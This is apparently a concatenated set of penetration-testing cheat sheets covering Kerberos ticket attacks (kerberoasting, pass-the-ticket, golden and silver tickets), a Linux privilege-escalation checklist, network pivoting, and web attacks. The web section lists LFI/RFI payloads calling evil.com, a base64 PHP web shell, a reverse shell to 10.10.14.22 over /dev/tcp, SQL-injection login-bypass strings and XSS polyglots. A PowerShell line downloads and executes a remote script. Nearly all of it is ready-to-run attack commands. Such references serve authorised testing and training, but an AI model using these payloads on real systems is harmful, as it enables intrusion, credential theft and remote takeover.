GetUserSPNs.py /: -outputfile 51 | ``` 52 | 53 | 54 | With [Rubeus](https://github.com/GhostPack/Rubeus): 55 | ```shell 56 | .\Rubeus.exe kerberoast /outfile: 57 | ``` 58 | 59 | With **Powershell**: 60 | ``` 61 | iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") 62 | Invoke-Kerberoast -OutputFormat | % { $_.Hash } | Out-File -Encoding ASCII 63 | ``` 64 | 65 | Cracking with dictionary of passwords: 66 | ```shell 67 | hashcat -m 13100 --force 68 | 69 | john --format=krb5tgs --wordlist= 70 | ``` 71 | 72 | 73 | ## Overpass The Hash/Pass The Key (PTK) 74 | 75 | By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 76 | ```shell 77 | # Request the TGT with hash 78 | python getTGT.py / -hashes [lm_hash]: 79 | # Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft) 80 | python getTGT.py / -aesKey 81 | # Request the TGT with password 82 | python getTGT.py /:[password] 83 | # If not provided, password is asked 84 | 85 | # Set the TGT for impacket use 86 | export KRB5CCNAME= 87 | 88 | # Execute remote commands with any of the following by using the TGT 89 | python psexec.py /@ -k -no-pass 90 | python smbexec.py /@ -k -no-pass 91 | python wmiexec.py /@ -k -no-pass 92 | ``` 93 | 94 | 95 | With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 96 | ```shell 97 | # Ask and inject the ticket 98 | .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 99 | 100 | # Execute a cmd in the remote machine 101 | .\PsExec.exe -accepteula \\ cmd 102 | ``` 103 | 104 | 105 | 106 | ## Pass The Ticket (PTT) 107 | 108 | ### Harvest tickets from Linux 109 | 110 | Check type and location of tickets: 111 | 112 | ```shell 113 | grep default_ccache_name /etc/krb5.conf 114 | ``` 115 | If none return, default is FILE:/tmp/krb5cc_%{uid}. 116 | 117 | In case of file tickets, you can copy-paste (if you have permissions) for use them. 118 | 119 | In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them: 120 | 121 | ```shell 122 | # To dump current user tickets, if root, try to dump them all by injecting in other user processes 123 | # to inject, copy tickey in a reachable folder by all users 124 | cp tickey /tmp/tickey 125 | /tmp/tickey -i 126 | ``` 127 | 128 | ### Harvest tickets from Windows 129 | 130 | With [Mimikatz](https://github.com/gentilkiwi/mimikatz): 131 | ```shell 132 | mimikatz # sekurlsa::tickets /export 133 | ``` 134 | 135 | With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell: 136 | ```shell 137 | .\Rubeus dump 138 | 139 | # After dump with Rubeus tickets in base64, to write the in a file 140 | [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) 141 | ``` 142 | 143 | 144 | To convert tickets between Linux/Windows format with [ticket_converter.py](https://github.com/Zer1t0/ticket_converter): 145 | 146 | ``` 147 | python ticket_converter.py ticket.kirbi ticket.ccache 148 | python ticket_converter.py ticket.ccache ticket.kirbi 149 | ``` 150 | 151 | ### Using ticket in Linux: 152 | 153 | With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 154 | ```shell 155 | # Set the ticket for impacket use 156 | export KRB5CCNAME= 157 | 158 | # Execute remote commands with any of the following by using the TGT 159 | python psexec.py /@ -k -no-pass 160 | python smbexec.py /@ -k -no-pass 161 | python wmiexec.py /@ -k -no-pass 162 | ``` 163 | 164 | 165 | ### Using ticket in Windows 166 | 167 | Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz): 168 | ```shell 169 | mimikatz # kerberos::ptt 170 | ``` 171 | 172 | Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): 173 | ```shell 174 | .\Rubeus.exe ptt /ticket: 175 | ``` 176 | 177 | Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 178 | ```shell 179 | .\PsExec.exe -accepteula \\ cmd 180 | ``` 181 | 182 | ## Silver ticket 183 | 184 | With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 185 | ```shell 186 | # To generate the TGS with NTLM 187 | python ticketer.py -nthash -domain-sid -domain -spn 188 | 189 | # To generate the TGS with AES key 190 | python ticketer.py -aesKey -domain-sid -domain -spn 191 | 192 | # Set the ticket for impacket use 193 | export KRB5CCNAME= 194 | 195 | # Execute remote commands with any of the following by using the TGT 196 | python psexec.py /@ -k -no-pass 197 | python smbexec.py /@ -k -no-pass 198 | python wmiexec.py /@ -k -no-pass 199 | ``` 200 | 201 | With [Mimikatz](https://github.com/gentilkiwi/mimikatz): 202 | ```shell 203 | # To generate the TGS with NTLM 204 | mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: 205 | 206 | # To generate the TGS with AES 128 key 207 | mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: 208 | 209 | # To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) 210 | mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: 211 | 212 | # Inject TGS with Mimikatz 213 | mimikatz # kerberos::ptt 214 | ``` 215 | 216 | Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): 217 | ```shell 218 | .\Rubeus.exe ptt /ticket: 219 | ``` 220 | 221 | Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 222 | ```shell 223 | .\PsExec.exe -accepteula \\ cmd 224 | ``` 225 | 226 | ## Golden ticket 227 | 228 | With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: 229 | ```shell 230 | # To generate the TGT with NTLM 231 | python ticketer.py -nthash -domain-sid -domain 232 | 233 | # To generate the TGT with AES key 234 | python ticketer.py -aesKey -domain-sid -domain 235 | 236 | # Set the ticket for impacket use 237 | export KRB5CCNAME= 238 | 239 | # Execute remote commands with any of the following by using the TGT 240 | python psexec.py /@ -k -no-pass 241 | python smbexec.py /@ -k -no-pass 242 | python wmiexec.py /@ -k -no-pass 243 | ``` 244 | 245 | 246 | With [Mimikatz](https://github.com/gentilkiwi/mimikatz): 247 | ```shell 248 | # To generate the TGT with NTLM 249 | mimikatz # kerberos::golden /domain:/sid: /rc4: /user: 250 | 251 | # To generate the TGT with AES 128 key 252 | mimikatz # kerberos::golden /domain:/sid: /aes128: /user: 253 | 254 | # To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) 255 | mimikatz # kerberos::golden /domain:/sid: /aes256: /user: 256 | 257 | # Inject TGT with Mimikatz 258 | mimikatz # kerberos::ptt 259 | ``` 260 | 261 | Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): 262 | ```shell 263 | .\Rubeus.exe ptt /ticket: 264 | ``` 265 | 266 | Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): 267 | ```shell 268 | .\PsExec.exe -accepteula \\ cmd 269 | ``` 270 | 271 | ## Misc 272 | 273 | To get NTLM from password: 274 | ```python 275 | python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "".encode("utf-16le")).digest())' 276 | ``` 277 | 278 | ## Tools 279 | 280 | * [Impacket](https://github.com/SecureAuthCorp/impacket) 281 | * [Mimikatz](https://github.com/gentilkiwi/mimikatz) 282 | * [Rubeus](https://github.com/GhostPack/Rubeus) 283 | * [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module 284 | * [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) 285 | * [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute) 286 | * [tickey](https://github.com/TarlogicSecurity/tickey) 287 | * [ticket_converter.py](https://github.com/Zer1t0/ticket_converter) 288 | -------------------------------------------------------------------------------- /linux-privesc.md: -------------------------------------------------------------------------------- 1 | A checklist for linux privesc. Might be missing lots of things. Is mostly taken from https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 2 | 3 | Do you have a decent shell? 4 | ```bash 5 | python -c 'import pty;pty.spawn("/bin/bash")' 6 | python3 -c 'import pty;pty.spawn("/bin/bash")' 7 | echo os.system('/bin/bash') 8 | /bin/sh -i 9 | ``` 10 | To get tab completion working 11 | ```bash 12 | ctrl+z 13 | echo $TERM && tput lines && tput cols 14 | 15 | stty raw -echo 16 | fg 17 | 18 | reset 19 | export SHELL=bash 20 | export TERM=xterm-256color (screen when running tmux) 21 | stty rows columns 22 | ``` 23 | Or use Socat for a full reverse tty 24 | ```bash 25 | socat file:`tty`,raw,echo=0 tcp-listen:12345 26 | ``` 27 | 28 | 29 | ### Initial Recon 30 | Start by checking the version and distro of the machine for possible kernel exploits, and also the sudo permissions of whatever account you have if possible. 31 | ```bash 32 | lsb_release -a && uname -a 33 | cat /etc/issue 34 | cat /etc/*-release 35 | cat /proc/version 36 | sudo -l 37 | ``` 38 | To do things quick, run the LinEnum script from Rebootuser. 39 | 40 | https://github.com/rebootuser/LinEnum 41 | 42 | Check for plaintext passwords with it 43 | ```bash 44 | ./LinEnum.sh -t -k password 45 | ``` 46 | What users have shells on the box? 47 | ```bash 48 | grep -vE "nologin|false" /etc/passwd 49 | ``` 50 | Anything in users home directories or mail? 51 | ```bash 52 | ls -ahlR /root/ 53 | ls -ahlR /home/ 54 | cat ~/.bash_history 55 | cat ~/.nano_history 56 | cat ~/.atftp_history 57 | cat ~/.mysql_history 58 | cat ~/.php_history 59 | cat ~/.bashrc 60 | cat ~/.profile 61 | cat /var/mail/root 62 | cat /var/spool/mail/root 63 | ``` 64 | 65 | Anything else in the environmental variables? symlinks? 66 | ```bash 67 | cat /etc/profile 68 | cat /etc/bashrc 69 | cat ~/.bash_profile 70 | cat ~/.bash_logout 71 | env 72 | set 73 | find / -type l -ls 74 | ``` 75 | Anything going on with the network? hidden services? logged in users? 76 | ```bash 77 | /sbin/ifconfig -a 78 | cat /etc/network/interfaces 79 | cat /etc/sysconfig/network 80 | lsof -i 81 | lsof -i :80 82 | grep 80 /etc/services 83 | netstat -antup 84 | netstat -antpx 85 | netstat -tulpn 86 | chkconfig --list 87 | chkconfig --list | grep 3:on 88 | last 89 | w 90 | arp -a 91 | ``` 92 | 93 | Can you sniff traffic? 94 | ```bash 95 | tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21 96 | ``` 97 | 98 | 99 | 100 | ### SUID Files, Root Services, and Other Files 101 | 102 | Check for things running as root 103 | ```bash 104 | ps aux | grep root 105 | ps -ef | grep root 106 | ``` 107 | Check the version of something that's installed 108 | ```bash 109 | dpkg -l | grep -i PAM 110 | ``` 111 | Any file-systems mounted or unmounted? 112 | ```bash 113 | mount 114 | df -h 115 | cat /etc/fstab 116 | ``` 117 | Then do suid/guid and other interesting files. 118 | ```bash 119 | find / -perm -4000 -exec ls -al -print 2>/dev/null {} \; 120 | find / -uid 0 -perm -4000 2>/dev/null 121 | ``` 122 | To create our own SUID binary 123 | ```bash 124 | print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c 125 | gcc -o /tmp/suid /tmp/suid.c 126 | sudo chmod +x /tmp/suid 127 | sudo chmod +s /tmp/suid 128 | ``` 129 | 130 | SGID (chmod 2000) - run as the group, not the user who started it. 131 | ```bash 132 | find / -perm -g=s -type f 2>/dev/null 133 | ``` 134 | SUID (chmod 4000) - run as the owner, not the user who started it. 135 | ```bash 136 | find / -perm -u=s -type f 2>/dev/null 137 | ``` 138 | Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. 139 | 140 | ```bash 141 | find / -perm -1000 -type d 2>/dev/null 142 | ``` 143 | 144 | Are any folders or files world writeable and executable? 145 | ```bash 146 | find / \( -perm -o w -perm -o x \) -type d 2>/dev/null 147 | find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 148 | ``` 149 | Anything modified recently? To check for executables updated in August 150 | ```bash 151 | find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug 152 | ``` 153 | To find anything modified in the last 10 minutes 154 | ```bash 155 | find / -mmin -10 -type f 2>/dev/null 156 | ``` 157 | Any writeable configuration files? 158 | ```bash 159 | find /etc/ -writable -type f 2>/dev/null 160 | ``` 161 | Or any files containing 'config' 162 | ```bash 163 | find . -iname '*config*' 164 | ``` 165 | To find a specific file 166 | ```bash 167 | find . -name suid* 168 | ``` 169 | Files with passwords? 170 | ```bash 171 | grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null 172 | find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; 173 | ``` 174 | Find .conf files(recursive 4 levels) and output line number where the word 'password' is located 175 | ```bash 176 | find / -maxdepth 7 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null 177 | ``` 178 | 179 | Or other sensitive files 180 | ```bash 181 | $ locate password | more 182 | /boot/grub/i386-pc/password.mod 183 | /etc/pam.d/common-password 184 | /etc/pam.d/gdm-password 185 | /etc/pam.d/gdm-password.original 186 | /lib/live/config/0031-root-password 187 | ``` 188 | 189 | Find all perl files ownd by rootme in /var/www 190 | ```bash 191 | find /var/www -user rootme -name "*.pl" 192 | ``` 193 | 194 | Scan for string in all files in a directory 195 | ```bash 196 | du . | awk '{print $2}'| grep -rnw "string" --color 197 | ``` 198 | 199 | Find password strings in memory 200 | ```bash 201 | strings /dev/mem -n10 | grep -i PASS 202 | ``` 203 | 204 | ### Cron 205 | Look through these 206 | ```bash 207 | crontab -l 208 | ls -alh /var/spool/cron 209 | ls -al /etc/ | grep cron 210 | ls -al /etc/cron* 211 | cat /etc/cron* 212 | cat /etc/at.allow 213 | cat /etc/at.deny 214 | cat /etc/cron.allow 215 | cat /etc/cron.deny 216 | cat /etc/crontab 217 | cat /etc/anacrontab 218 | cat /var/spool/cron/crontabs/root 219 | ``` 220 | This might not work but the for loop will list crontabs for a user. 221 | ```bash 222 | for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 223 | ``` 224 | This is a nice script from ihack4falafel to monitor cron and echo new processes 225 | 226 | https://github.com/ihack4falafel/OSCP/blob/master/BASH/CronJobChecker.sh 227 | 228 | ### Keys and Database Passwords 229 | 230 | Any private keys saved elsewhere? 231 | ```bash 232 | cat ~/.ssh/authorized_keys 233 | cat ~/.ssh/identity.pub 234 | cat ~/.ssh/identity 235 | cat ~/.ssh/id_rsa.pub 236 | cat ~/.ssh/id_rsa 237 | cat ~/.ssh/id_dsa.pub 238 | cat ~/.ssh/id_dsa 239 | cat /etc/ssh/ssh_config 240 | cat /etc/ssh/sshd_config 241 | cat /etc/ssh/ssh\_host\_dsa_key.pub 242 | cat /etc/ssh/ssh\_host\_dsa_key 243 | cat /etc/ssh/ssh\_host\_rsa_key.pub 244 | cat /etc/ssh/ssh\_host\_rsa_key 245 | cat /etc/ssh/ssh\_host\_key.pub 246 | cat /etc/ssh/ssh\_host\_key 247 | ``` 248 | Whats in var? 249 | ```bash 250 | ls -alh /var/log 251 | ls -alh /var/mail 252 | ls -alh /var/spool 253 | ls -alh /var/spool/lpd 254 | ls -alh /var/lib/pgsql 255 | ls -alh /var/lib/mysql 256 | cat /var/lib/dhcp3/dhclient.leases 257 | ``` 258 | Any files with database information? 259 | ```bash 260 | ls -alhR /var/www/ 261 | ls -alhR /srv/www/htdocs/ 262 | ls -alhR /usr/local/www/apache22/data/ 263 | ls -alhR /opt/lampp/htdocs/ 264 | ls -alhR /var/www/html/ 265 | ``` 266 | Default locations sometimes for good things 267 | ```bash 268 | cat /var/apache2/config.inc 269 | cat /var/lib/mysql/mysql/user.MYD 270 | cat /root/anaconda-ks.cfg 271 | ``` 272 | 273 | 274 | ### References 275 | 276 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 277 | 278 | https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/ 279 | 280 | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA 281 | 282 | https://bitvijays.github.io/LFC-VulnerableMachines.html#linux-privilege-escalation 283 | 284 | https://github.com/lucyoa/kernel-exploits 285 | 286 | https://github.com/SecWiki/linux-kernel-exploits 287 | 288 | 289 | 290 | -------------------------------------------------------------------------------- /pivoting.md: -------------------------------------------------------------------------------- 1 | # Port Forwarding Examples 2 | 3 | 4 | ## [Chisel](https://github.com/jpillora/chisel) 5 | First start the server on our machine. 6 | ```bash 7 | chisel server -p 8000 --reverse 8 | ``` 9 | And then from our victim. 10 | ```bash 11 | ./chisel client 10.10.10.3:8000 R:socks 12 | ``` 13 | Our machine now has a listener on port 1080 which is a SOCKS5 proxy through the chisel client. 14 | 15 | ## [Ligolo](https://github.com/sysdream/ligolo) 16 | On your attack server. 17 | ```bash 18 | ./bin/localrelay_linux_amd64 19 | ``` 20 | On the compromise host. 21 | ```bash 22 | > ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555 23 | ``` 24 | Once the connection is established, set the following parameters on the ProxyChains config file (On the attack server): 25 | ```bash 26 | [ProxyList] 27 | # add proxy here ... 28 | # meanwile 29 | # defaults set to "tor" 30 | socks5 127.0.0.1 1080 31 | ``` 32 | Profit. 33 | ```bash 34 | $ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A 35 | $ proxychains rdesktop 10.0.0.123 36 | ``` 37 | ## SSH dynamic port forward 38 | 39 | ```bash 40 | ssh -D8080 [user]@[host] 41 | 42 | ssh -N -f -D 9000 [user]@[host] 43 | -f : ssh in background 44 | -N : do not execute a remote command 45 | ``` 46 | ## SSH double pivots from one network to another 47 | SOCKS proxy over two hops into internal network. 48 | ```bash 49 | ssh -D 127.0.0.1:1080 -p 22 user1@IP1 50 | Add socks4 127.0.0.1 1080 in /etc/proxychains.conf 51 | proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 52 | Add socks4 127.0.0.1 1081 in /etc/proxychains.conf 53 | proxychains commands target 54 | ``` 55 | ## SSH remote port forwarding 56 | Forward a single port on the remote machine to a port on our box. 57 | ```bash 58 | ssh -R 9000:localhost:8001 username@hostname 59 | ssh -R 2222:localhost:22 username@hostname - SSH 60 | ssh -R 2223:localhost:5902 username@hostname - VNC 61 | autossh -M 20000 -f -R 2222:localhost:80 username@hostname 62 | ``` 63 | ## [SShuttle](https://sshuttle.readthedocs.io/en/stable/usage.html) 64 | 65 | To sshuttle into an internal network and forward all traffic: 66 | ```bash 67 | sshuttle -r user@10.10.10.10 10.1.1.0/24 -vNH -e 'ssh -i id_rsa' 68 | ``` 69 | 70 | ## Windows netsh 71 | 72 | ```powershell 73 | netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport 74 | 75 | netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 76 | ``` 77 | 78 | ## Plink 79 | 80 | ```powershell 81 | plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server 82 | plink -l root -pw mypassword 192.168.18.84 -R 83 | plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] 84 | ``` 85 | 86 | ## [Meterpreter portfwd](https://www.offensive-security.com/metasploit-unleashed/portfwd/) 87 | Forward remote port to local address. 88 | ```bash 89 | meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141 90 | kali > rdesktop 127.0.0.1:3389 91 | 92 | or 93 | 94 | portfwd list 95 | portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 96 | 97 | or 98 | 99 | run autoroute -s 192.168.57.0/24 100 | use auxiliary/server/socks4a 101 | ``` 102 | 103 | ## References 104 | https://chryzsh.gitbooks.io/pentestbook/content/port_forwarding_and_tunneling.html 105 | 106 | https://blog.ropnop.com/ 107 | 108 | https://www.toshellandback.com/2017/02/11/psexec/ 109 | 110 | https://blog.ropnop.com/practical-usage-of-ntlm-hashes/ 111 | -------------------------------------------------------------------------------- /web.md: -------------------------------------------------------------------------------- 1 | ## Basic LFI 2 | Thanks to https://github.com/swisskyrepo/PayloadsAllTheThings 3 | 4 | ``` 5 | http://example.com/index.php?page=../../../etc/passwd 6 | ``` 7 | 8 | ### Null byte 9 | 10 | ``` 11 | http://example.com/index.php?page=../../../etc/passwd%00 12 | ``` 13 | 14 | ### Double encoding 15 | 16 | ``` 17 | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd 18 | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 19 | ``` 20 | 21 | ### Path and dot truncation 22 | 23 | On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. 24 | 25 | ``` 26 | http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] 27 | http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] 28 | http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 29 | http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd 30 | ``` 31 | 32 | ### Filter bypass tricks 33 | 34 | ``` 35 | http://example.com/index.php?page=....//....//etc/passwd 36 | http://example.com/index.php?page=..///////..////..//////etc/passwd 37 | http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd 38 | ``` 39 | 40 | ## Basic RFI 41 | 42 | Most of the filter bypasses from LFI section can be reused for RFI. 43 | 44 | ``` 45 | http://example.com/index.php?page=http://evil.com/shell.txt 46 | ``` 47 | 48 | ### Null byte 49 | 50 | ``` 51 | http://example.com/index.php?page=http://evil.com/shell.txt%00 52 | ``` 53 | 54 | ### Double encoding 55 | 56 | ``` 57 | http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt 58 | ``` 59 | 60 | ### Bypass allow_url_include 61 | 62 | When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 63 | 64 | 1. Create a share open to everyone 65 | 2. Write a PHP code inside a file : `shell.php` 66 | 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` 67 | 68 | 69 | ## LFI / RFI using wrappers 70 | 71 | ### Wrapper php://filter 72 | 73 | The part "php://filter" is case insensitive 74 | 75 | ``` 76 | http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php 77 | http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php 78 | http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php 79 | ``` 80 | 81 | can be chained with a compression wrapper for large files. 82 | 83 | ``` 84 | http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd 85 | ``` 86 | 87 | NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` 88 | 89 | 90 | ### LFI Wrapper ZIP 91 | ``` 92 | echo "
" > payload.php; 93 | zip payload.zip payload.php; 94 | mv payload.zip shell.jpg; 95 | rm payload.php 96 | 97 | http://example.com/index.php?page=zip://shell.jpg%23payload.php 98 | ``` 99 | 100 | ### RFI Wrapper DATA with "" payload 101 | ``` 102 | http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAh 103 | ``` 104 | 105 | ### Wrapper expect:// 106 | 107 | ``` 108 | http://example.com/index.php?page=expect://id 109 | http://example.com/index.php?page=expect://ls 110 | ``` 111 | 112 | ### Wrapper input:// 113 | 114 | Specify your payload in the POST parameters 115 | 116 | ``` 117 | http://example.com/index.php?page=php://input 118 | POST DATA: 119 | ``` 120 | 121 | ### LFI to RCE via /proc/self/environ 122 | 123 | Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file 124 | 125 | ``` 126 | GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 127 | User-Agent: 128 | ``` 129 | 130 | ### Logfile Injection 131 | Don't forget maybe you can connect to the server and write code into the logfiles. This may also work with emails if you can view them. 132 | ``` 133 | nc 134 | GET / HTTP/1.1 135 | Host: 136 | Connection: close 137 | ``` 138 | 139 | Afterwards include the it via LFI: 140 | ```?lfi_file=/var/log/apache2/access.log&cmd=``` 141 | 142 | Example log files to try: 143 | ``` 144 | http://example.com/index.php?page=/var/log/apache/access.log 145 | http://example.com/index.php?page=/var/log/apache/error.log 146 | http://example.com/index.php?page=/var/log/vsftpd.log 147 | http://example.com/index.php?page=/var/log/sshd.log 148 | http://example.com/index.php?page=/var/log/mail 149 | http://example.com/index.php?page=/var/log/httpd/error_log 150 | http://example.com/index.php?page=/usr/local/apache/log/error_log 151 | http://example.com/index.php?page=/usr/local/apache2/log/error_log 152 | ``` 153 | 154 | ### More shell examples and snippets 155 | Evil.txt example to use with any RFI 156 | ``` 157 | 158 | 159 | # Or just get a reverse shell directly like this: 160 | /dev/tcp/10.10.14.22/443; sh <&196 >&196 2>&196"); ?> 161 | ``` 162 | Base64 163 | ``` 164 | 165 | ``` 166 | Other ways to make a shell 167 | ``` 168 | 169 | 170 | ``` 171 | If you use REQUEST, you can use the GET and POST parameter: 172 | ``` 173 | 174 | ``` 175 | ``` 176 | curl -X PUT -d ' 178 |
179 | 180 | ``` 181 | 182 | 183 | A good overview of all this https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ 184 | 185 | list of possible Apache directories: http://wiki.apache.org/httpd/DistrosDefaultLayout 186 | 187 | include access log from file descriptor /proc/self/fd/XX: http://pastebin.com/raw.php?i=cRYvK4jb 188 | 189 | include email log files: http://devels-playground.blogspot.de/2007/08/local-file-inclusion-tricks.html 190 | 191 | include session files: https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/ 192 | 193 | include PHP’s temporarily uploaded files http://gynvael.coldwind.pl/?id=376 194 | 195 | 196 | ## MySQL stuff 197 | 198 | ### Classic authentication bypass strings 199 | ``` 200 | '-' 201 | ' ' 202 | '&' 203 | '^' 204 | '*' 205 | ' or ''-' 206 | ' or '' ' 207 | ' or ''&' 208 | ' or ''^' 209 | ' or ''*' 210 | "-" 211 | " " 212 | "&" 213 | "^" 214 | "*" 215 | " or ""-" 216 | " or "" " 217 | " or ""&" 218 | " or ""^" 219 | " or ""*" 220 | or true-- 221 | " or true-- 222 | ' or true-- 223 | ") or true-- 224 | ') or true-- 225 | ' or 'x'='x 226 | ') or ('x')=('x 227 | ')) or (('x'))=(('x 228 | " or "x"="x 229 | ") or ("x")=("x 230 | ")) or (("x"))=(("x 231 | '-- - 232 | '-- -# 233 | admin' -- 234 | admin' # 235 | admin'/* 236 | admin' or '1'='1 237 | admin' or '1'='1'-- 238 | admin' or '1'='1'# 239 | admin' or '1'='1'/* 240 | admin'or 1=1 or ''=' 241 | admin' or 1=1 242 | admin' or 1=1-- 243 | admin' or 1=1# 244 | admin' or 1=1/* 245 | admin') or ('1'='1 246 | admin') or ('1'='1'-- 247 | admin') or ('1'='1'# 248 | admin') or ('1'='1'/* 249 | admin') or '1'='1 250 | admin') or '1'='1'-- 251 | admin') or '1'='1'# 252 | admin') or '1'='1'/* 253 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 254 | admin" -- 255 | admin" # 256 | admin"/* 257 | admin" or "1"="1 258 | admin" or "1"="1"-- 259 | admin" or "1"="1"# 260 | admin" or "1"="1"/* 261 | admin"or 1=1 or ""=" 262 | admin" or 1=1 263 | admin" or 1=1-- 264 | admin" or 1=1# 265 | admin" or 1=1/* 266 | admin") or ("1"="1 267 | admin") or ("1"="1"-- 268 | admin") or ("1"="1"# 269 | admin") or ("1"="1"/* 270 | admin") or "1"="1 271 | admin") or "1"="1"-- 272 | admin") or "1"="1"# 273 | admin") or "1"="1"/* 274 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 275 | ``` 276 | ### SQLi 277 | Check if you can find a row, where you can place your output 278 | ```http://ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8``` 279 | 280 | Get the version of the database 281 | ```http://ip/inj.php?id=1 union all select 1,2,3,@@version,5``` 282 | 283 | Get the current user 284 | ```http://ip/inj.php?id=1 union all select 1,2,3,user(),5``` 285 | 286 | See all tables 287 | ```http://ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables``` 288 | 289 | Get column names for a specified table 290 | ```http://ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'``` 291 | 292 | Concat user names and passwords (0x3a represents “:”) 293 | ```http://ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users``` 294 | 295 | Write into a file 296 | ```http://ip/inj.php?id=1 union all select 1,2,3,"content",5 into OUTFILE 'outfile'``` 297 | 298 | 299 | ## XSS Polyglots 300 | 301 | Polyglot XSS - 0xsobky 302 | 303 | ```javascript 304 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e 305 | ``` 306 | 307 | Polyglot XSS - Ashar Javed 308 | 309 | ```javascript 310 | ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 311 | ``` 312 | 313 | Polyglot XSS - Mathias Karlsson 314 | 315 | ```javascript 316 | " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// 317 | ``` 318 | 319 | Polyglot XSS - Rsnake 320 | 321 | ```javascript 322 | 